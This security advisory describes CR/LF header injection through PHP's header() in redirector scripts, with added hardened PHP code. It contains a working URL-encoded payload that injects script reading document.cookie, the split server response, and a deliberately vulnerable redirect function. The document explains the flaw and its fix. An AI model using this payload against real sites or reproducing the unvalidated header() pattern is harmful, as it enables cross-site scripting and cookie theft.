A vulnerability in the way certain PHP scripts pass user-supplied URLs to the header() function allows an attacker to inject a CR/LF sequence, terminate the HTTP headers early and have the server return attacker-controlled HTML and JavaScript as if it were the site's own content. The following is a theoretical example.
Credit:
The information has been provided by Matthew Murphy.
PHP's header() function sends a raw HTTP header line to the client, for example:
<?php header("Location: http://www.yahoo.com/"); ?>
Redirector scripts that take the destination from a request parameter are commonplace, such as this one:
--- REDIR.PHP ---
<?php header("Location: " . $_GET['url']); ?>
--- REDIR.PHP ---
Nothing in this script checks the value of "url" before it is placed in the header, so a request like the following:
http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%21%2D%2D
(decoded, the url parameter is "http://www.yahoo.com/", followed by CR LF CR LF, followed by "<SCRIPT>alert(document.cookie)</SCRIPT><!--")
will cause the following response to be produced (the attacker-supplied data is shown between the braces; the doubled CR/LF after the Location line ends the header block, so everything after it is treated by the browser as the response body):
HTTP/1.1 302 Found
Server: Xitami
Date: Sat, 07 Sep 2002 21:50:17 GMT
Content-length: 96
Content-type: text/html
X-powered-by: PHP/4.2.3
{Location: http://www.yahoo.com/

<SCRIPT>alert(document.cookie)</SCRIPT><!--} <-- See our code in between the braces
Content-type: text/html
The injected HTML is deliberately "broken": the opening "<!--" has no matching "-->", so the page does not comply with the relevant standards. Matthew did this to comment out the Content-type header that PHP emits after the Location header; because that line now falls after the injected blank line, it is part of the body and would otherwise be displayed as text in the attacker's page.
Using this technique, an attacker can mount cross-site scripting attacks against the site's users (the script runs in the vulnerable site's origin and can read its cookies, as the alert(document.cookie) payload demonstrates) and, in rarer cases, can trigger file downloads or other browser behaviour by injecting additional HTTP headers such as Content-Disposition.
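The vulnerable redirector beside a hardened version, as an added example (this is not code from the original advisory or from Matthew Murphy). The hardened version rejects any control character in the parameter, requires an absolute http(s) URL, and only redirects to hosts on an allow list; the list $allowed and the helper names are assumptions for the example. Note also that PHP itself has refused header() values containing a newline since 4.4.2 / 5.1.2, so the raw injection shown above only works on older builds; the input validation still matters because it also closes the open-redirect hole.

```php
<?php
// Added example, not part of the original advisory. Demonstrates the
// vulnerable redirector from the text next to a hardened replacement.

// --- vulnerable: the request parameter reaches header() untouched ---
function redirect_vulnerable(string $url): void
{
    // A CR/LF in $url ends the Location header; a doubled CR/LF ends the
    // header block and everything after it becomes the response body.
    header("Location: " . $url);
    exit;
}

// --- hardened: validate first, then build the header from a checked value ---
// Returns the URL to redirect to, or null if the input must be rejected.
function safe_redirect_target(string $url, array $allowed_hosts): ?string
{
    // 1. Control characters (including CR and LF) have no place in a URL.
    if (preg_match('/[\x00-\x1F\x7F]/', $url)) {
        return null;
    }
    // 2. Require a parseable, absolute http or https URL.
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // 3. Only redirect to hosts this application knows about; this also
    //    prevents the script being abused as an open redirector.
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return null;
    }
    return $url;
}

function redirect_hardened(string $url, array $allowed_hosts): void
{
    $target = safe_redirect_target($url, $allowed_hosts);
    if ($target === null) {
        http_response_code(400);
        header('Content-Type: text/plain');
        echo "Invalid redirect target\n";
        exit;
    }
    header('Location: ' . $target);
    exit;
}

// Constructed input: the advisory's payload as PHP sees it in $_GET after
// URL decoding. $allowed is an assumed site-specific allow list.
$payload = "http://www.yahoo.com/\r\n\r\n<SCRIPT>alert(document.cookie)</SCRIPT><!--";
$allowed = ['www.yahoo.com'];

if (PHP_SAPI === 'cli') {
    // Run from the command line: the payload is rejected, a clean URL is accepted.
    var_dump(safe_redirect_target($payload, $allowed));
    var_dump(safe_redirect_target("http://www.yahoo.com/", $allowed));
} else {
    // Run under a web server: behave as the hardened redir.php.
    redirect_hardened($_GET['url'] ?? '', $allowed);
}
```

Run it with "php redir.php" to see the two var_dump() results, or drop it in a web root and request it with the encoded payload from the advisory to confirm a 400 response instead of a split response. The control-character check is the part that addresses the injection itself; the scheme and host checks are there because a redirector that accepts any destination is a problem even when header() cannot be split.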